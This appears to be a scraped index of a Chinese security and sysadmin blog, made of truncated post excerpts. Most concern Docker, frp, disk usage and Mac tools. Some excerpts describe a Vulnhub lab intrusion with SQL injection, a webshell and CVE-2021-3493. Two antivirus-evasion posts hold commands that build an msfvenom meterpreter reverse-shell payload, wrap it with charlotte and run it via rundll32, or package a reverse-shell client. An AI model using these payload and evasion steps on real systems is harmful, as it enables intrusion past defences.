查找并删除
12find . -name '*.png' -type f -print -exec rm -rf {} \;find . -type f -name "*.log" -print0 | xargs -0 rm -f 指定一个替换字符串 {} XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it sha ...
记一次无能狂怒者的自我修复过程
事情经过今天打开kali 发现我一个平台的权限掉了,然后重新登录,大概情况像这样: 就是说我此时后台是没有网络的,但是我不知道!!! 因为正常我输入完密码还有一个二次验证,但是我密码都验证完了,为什么到了二次验证反而失败了了? 我第一想法是会不会是虚拟机时间问题,因为我是直接挂起的; 12kali: dpkg-reconfigure tzdatacentos: tzselect 同理,当我设置完时区后,我又修改了我服务器和docker 容器的时区; 问题依然存在;此刻的我彻底炸裂了,毕竟,人是情感生物,过了一会缓过来,我开始反思自己的问题 思索了半刻(其实也就1分钟),我觉得有必要查看一下输出日志 12ssh serverdocker logs admin 日志输出 123456789101112131415161718192021222324POST /identity/connect/token (login) => 400 Bad RequestPOST /identity/connect/tokenError sending new device email: Sm ...
Online Config VS Code
Run VS Code on any machine anywhere and access it in the browser. Arm please vist code-server code-server arm View InstallCode Server Update Datebase :You are advised to create a Docker container for the database 12345678910docker run -it -d \--name vs-db \-p 8003:3306 \-e "MYSQL_ROOT_PASSWORD=code-server" \mariadb:latest# vs-db ipaddress# $ docker exec -it vs-db bash# $ apt update -y && apt upgrade -y && apt install net-tools iputils-ping# $ ifconfig | grep ...
Vulnhub靶机打靶-hard-socnet2
Author: yifang 靶机详情 难度:高Tips 涉及知识:主机发现 端口扫描 SQL注入 文件上传 蚁剑上线 CVE-2021-3493 XMLRPC 逆向工程 动态调试 缓冲区溢出 漏洞利用代码编写 靶机下载地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova攻击方法有2种,CVE-2021-3493 另类提权方式攻击主机:kali Linux 2021 192.168.0.103目标主机: Ubuntu 18 攻击开始1nmap -p- -sV -sC 192.168.0.102 目标主机打开了22,80,8000端口 经过测试,80页面允许正常访问,8000端口不允许任何HTTP连接方式,猜测可能存在另类服务。 访问80页面发现存在当前页面, 二话不说直接进行sqlmap跑一波 前端存在SQL漏洞,获得admin账户进行登录,使用更改头像功能,上一句话木马, 蚁剑测试连接成功! 可以看到获得的权限为www-data权限,尝试进行提权 123456(www-data:/ ...
Mac 向日葵 开启权限
大部分Mac用户可能都遇到过向日葵远程卡慢甚至远程不了的情况 主要介绍向日葵被控不了的情况 第一次安装是这样,然后 按照要求勾选 还是不行 ? 往下拉,你会发现一个 SunloginClient_Desktop 右键 在访达中显示 待会要用 现在 辅助功能 绿了,继续开启 屏幕录制 还是不行,为啥呢? 点击 + 号,选择我们刚刚那个 SunloginClient_Desktop 打开 完工,收工 XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be ...
磁盘占用高 分析建议
处置分析症状:cp: 无法创建目录 ‘’: 设备上没有空间 1234sudo sucd /lsdf -h 很明显,得从 / 根目录着手 1du -h --max-depth=1 | grep -v K | grep -v M 这里最大的是./usr/ 其他的看起来正常 1cd /usr 样子在 ./share 里面 1cd share 1du -h --max-depth=1 | grep -v K | grep -v M 明白了,前几天 Android SDK 下载多了,导致没内存了,自行处理吧! 扩展Linux du 命令 Linux 命令大全 引用于 https://www.runoob.com/linux/linux-comm-du.html 菜鸟教程 Linux du (英文全拼:disk usage)命令用于显示目录或文件的大小。 du 会显示指定的目录或文件所占用的磁盘空间。 语法1du [-abcDhHklmsSx][-L <符号连接>][-X <文件>][--block-size][--exclude=<目录或文件> ...
frp 工具使用
frp Home:https://gofrp.org/docs/Frp GitHub:https://gofrp.org/docs/ 网卡名称 子网IP Web 192.168.158.0/24 Nat0 172.16.115.0/24 Nat1 192.168.104.0/24 Nat2 172.16.186.0/24 方案1Frpc.ini12345678910111213141516171819202122232425262728293031323334353637383940414243444546#frpc[common]server_addr = 192.168.158.3server_port = 7000[socks_proxy]type = tcplocal_port = 9999remote_port = 9999use_encryption = trueuse_compression = true# frpc1[common]server_addr = 172.16.115.6server_por ...
docker 新手入门进阶详细篇
Docker简介 Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器或Windows 机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。 废话不讲辣么多,干就完事 0x01 docker 换源 首先dokcer 官方仓库是搭建在国外的,所以我们需要 换源参考博客🔗* https://blog.csdn.net/doudou_mylove/article/details/105122843 获取专属 docker 加速地址 为啥要强行修改dns 呢?可能我只是想解析的更快点吧,男人不能不行,倒是必须得快🤢 1sudo vim /etc/docker/daemon.json 123456789{ "registry-mirrors": [ "https://vipxxx.mirror.aliyuncs.com" ], "dns": [ "223.5.5.5", ...
关于Mac brew 那些事
! 这是一篇失败的帖子,切勿操作 根据苹果的 官方说明,以下路径受到保护: 12345/System/usr (不包含 /usr/local)/bin/sbinApps that are pre-installed with OS X 所以可以利用brew install 工具至/opt/homebrew/避开SIP策略 同理,proxychanis-NG 就能愉快的使用了 12345678910111213chmod -R 777 /optchown -R `whoami`:staff /optcurl https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh > /opt/brew.sh### 请手动查找 /usr/local/opt 并替换为 /opt/homebrew###echo 'export PATH=$PATH:/opt/homebrew/bin' >> ~/.zshrc### 强烈建议export https_proxy=h ...
狗东西【鄙人】继续免杀的一天
今日闲谈 各位兄弟别学了,不然弟弟没法混饭吃啊 先贴代码12345678pip install pyinstaller# pyinstaller -F -w -i img.ico main.pypyinstaller --onefile --icon=img.ico main.py -w# client.pyhttps://cdn.jsdelivr.net/gh/apurvsinghgautam/HTTP-Reverse-Shell@master/client.py# server.pyhttps://cdn.jsdelivr.net/gh/apurvsinghgautam/HTTP-Reverse-Shell@master/server.py 上图 emmm 看来得学 Go 混淆一下,至少上传的时候能活着,不至于上传都过不去 XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensur ...
Web RTC
RESUMEWebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准。 测试网站:https://ip.voidsec.com/ 插件:https://mybrowseraddon.com/webrtc-control.html 直连模式 Socks5代理模式 Burp-Suite 抓包模式 Burp-Suite 设置上级Socks代理 Burp-Suite建议添加上级代理
RancherOS 极简主义
0x1 InI 如果你不希望为了使用Docker 而增加负担,不妨试试这个RancherOS NAME : RancherOS SITE : https://rancher.com/ RESUME: 一个极轻量且安全的Linux发行版。它由容器构建,将赋予您更好的容器运行体验。 0x2 INSTALL BY VMWARE1234Booting from ISO https://releases.rancher.com/os/latest/vmware/rancheros.isoFor docker-machine https://releases.rancher.com/os/latest/vmware/rancheros-autoformat.isoVMDK https://releases.rancher.com/os/latest/vmware/rancheros.vmdkInitrd https://releases.rancher.com/os/latest/vmware/initrd 0x21 Set Up VM 开机注意连接 ISO 0x22 P ...
大宝剑了解一下
About 大宝剑-信息收集和资产梳理工具(红队、蓝队、企业组织架构、子域名、Web资产梳理、Web指纹识别、ICON_Hash资产匹配) 我个人认为这也是一款优秀的溯源工具,绝对是在能让你在客户现场加餐的优秀工具 Install 容器自动 pull 最新版,除非有大变更 1docker run -it --name dbj -p 5000:5000 xrsec/dbj:latest InI123admin / adminhttp://localhost:5000/admin/https://github.com/wgpsec/DBJ 查看具体输出信息 12docker logs dbj#watch docker logs dbj Debug 穷人家的孩子总喜欢瞎折腾 贫穷限制了我的想象力,但是无法限制我的行动力 Dockerdbj.sh12345678910111213141516#!/bin/shclearecho "\n\033[1;34m __ __ ____ \033[0m"echo &q ...
N1搞机之旅
事情的起因:好师傅闲置了一台N1,刚好我准备入手一台,于是就20元白嫖了一台,某多多150到手 哎,就是玩,正式介绍一下N1 最不正经的NAS—斐讯N1,其实我是盒子派来的卧底 电视盒子 OPENWRT ******** 推荐使用因为师傅寄过来的时候已经成砖了,我那时候啥也不懂,于是乎就买了一根USB双公头线(其实两根手机充电线拼接一下也就🆗了) 也不需要什么拆机短触,直接连接双公头线,打开刷机软件,提前选好并点击刷机按钮,然后开机,然后就 滴。。。 我这里有一份自己线刷用到的工具包你要不要。。。 链接:https://pan.baidu.com/s/18doXN_DymKo7SaIyGvqT8A提取码:vd27 解压密码:pass 我是先刷的 N1_YYFROM夏杰语音实用版 电视系统,然后再刷的Arch Linxu 接着转换 Centos ,听说Centos 得安装低版本,然后再升级 升级Centos 8 我放弃了,老老实实用吧,啥,你不会连 Arch 都不知道咋装吧,百度 N1 Arch不行嘛? 换源。默认情况下,没有默认情况 123cp /etc/yum.r ...
脚本小子免杀的一天
charlotte 低调入过 不点赞的都是龟孙 预览 / Preview 生成payload12345git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*cd charlottemsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.binpython charlotte.py # 最后一行有个命令 rundll32 xxxxxxxxrundll32 charlotte.dll, UehQD3rwWxT 运行payload1C:\Windows\System32\rundll32.exe C:\Users\xr\Desktop\charlotte.dll UehQD3rwWxT 监听payload12345use exploit/multi/handlerset payload windows/x64/ ...